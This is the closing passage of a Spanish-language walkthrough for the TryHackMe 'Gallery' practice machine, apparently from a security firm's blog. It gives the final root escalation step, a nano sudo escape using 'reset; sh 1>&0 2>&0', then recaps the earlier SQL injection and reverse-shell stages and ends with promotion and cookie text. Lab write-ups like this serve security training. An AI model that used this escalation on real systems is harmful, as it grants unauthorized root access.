Ahora, ejecuta nuevamente el comando sudo /bin/bash /opt/rootkit.sh y en las opciones de nano, elige read.
Ahora, realiza los siguientes pasos en nano:
^R^X (Ctrl+R, Ctrl+X)
Esto te proporcionará una línea de comandos en la parte inferior de nano. Escribe:
reset; sh 1>&0 2>&0
Esto establecerá una nueva sesión de shell.
¡Ahora serás el usuario root! Puedes obtener la última bandera y realizar cualquier acción como root.
Siguiendo estos pasos, lograrás la escalada final de privilegios y obtendrás acceso como usuario root. Asegúrate de seguir las mejores prácticas de seguridad y actuar de manera ética en todo momento.
Resumen del proceso y tipo de máquina trabajada:
En este manual, se ha seguido un proceso paso a paso para realizar el pentesting de la máquina Gallery en Try Hack Me. Se han cubierto los siguientes aspectos clave:
Preparación del entorno: Actualización del sistema operativo, organización de archivos, configuración del archivo de hosts y registro de indicios.
Comienzo del hackeo: Comprobación de disponibilidad, enumeración de puertos abiertos, escaneo web con WhatWeb y exploración de la aplicación con Dirb.
Búsqueda de exploits: Utilización de la herramienta «searchsploit» para buscar exploits relacionados con la versión de «Simple Image Gallery» y prueba de exploits seleccionados.
Obtención del hash de contraseña: Captura de una solicitud HTTP con Burp Suite, análisis de la solicitud con «sqlmap» para obtener información sobre las bases de datos, tablas y usuarios, y extracción de los hashes de contraseña.
Volver a la shell reversa: Configuración de la shell reversa, transferencia de archivos y búsqueda de vulnerabilidades en el sistema.
Escalada de privilegios final: Utilización de una vulnerabilidad en el comando «nano» para realizar la escalada de privilegios hasta el usuario «root».
Según la experiencia proporcionada, la máquina Gallery de Try Hack Me es una máquina de nivel intermedio, aunque en la plataforma es fácil. Proporciona la oportunidad de practicar varias técnicas de pentesting, incluyendo enumeración de puertos, análisis de aplicaciones web, búsqueda de exploits, obtención de información de bases de datos y escalada de privilegios. Este tipo de máquinas son ideales para aquellos que desean mejorar sus habilidades en seguridad informática y familiarizarse con los procesos y herramientas utilizados en el pentesting.
Confía en DCSeguridad:
Si estás interesado en fortalecer aún más tus conocimientos y mantenerte al día con las últimas tendencias en seguridad informática, te recomendamos ponerte en contacto con DCSeguridad. Como empresa especializada en seguridad, DCSeguridad puede ofrecerte servicios de consultoría, auditoría y entrenamiento en seguridad informática.
Además, te animamos a unirte a nuestro canal de Telegram. En este canal, compartimos información relevante sobre nuevas vulnerabilidades, técnicas de ataque y mejores prácticas de seguridad. Es un lugar ideal para mantenerse actualizado y participar en discusiones con otros profesionales de seguridad. ¡Únete a nosotros y forma parte de nuestra comunidad dedicada a la seguridad informática!
Recuerda que la seguridad informática es un campo en constante evolución, por lo que es importante seguir aprendiendo y mejorando tus habilidades continuamente. ¡Buena suerte en tu viaje hacia convertirte en un experto en seguridad informática!
Para ofrecer las mejores experiencias, utilizamos tecnologías como las cookies para almacenar y/o acceder a la información del dispositivo. El consentimiento de estas tecnologías nos permitirá procesar datos como el comportamiento de navegación o las identificaciones únicas en este sitio. No consentir o retirar el consentimiento, puede afectar negativamente a ciertas características y funciones.
Funcional
Siempre activo
El almacenamiento o acceso técnico es estrictamente necesario para el propósito legítimo de permitir el uso de un servicio específico explícitamente solicitado por el abonado o usuario, o con el único propósito de llevar a cabo la transmisión de una comunicación a través de una red de comunicaciones electrónicas.
Preferencias
El almacenamiento o acceso técnico es necesario para la finalidad legítima de almacenar preferencias no solicitadas por el abonado o usuario.
Estadísticas
El almacenamiento o acceso técnico que es utilizado exclusivamente con fines estadísticos.El almacenamiento o acceso técnico que se utiliza exclusivamente con fines estadísticos anónimos. Sin un requerimiento, el cumplimiento voluntario por parte de tu proveedor de servicios de Internet, o los registros adicionales de un tercero, la información almacenada o recuperada sólo para este propósito no se puede utilizar para identificarte.
Marketing
El almacenamiento o acceso técnico es necesario para crear perfiles de usuario para enviar publicidad, o para rastrear al usuario en una web o en varias web con fines de marketing similares.
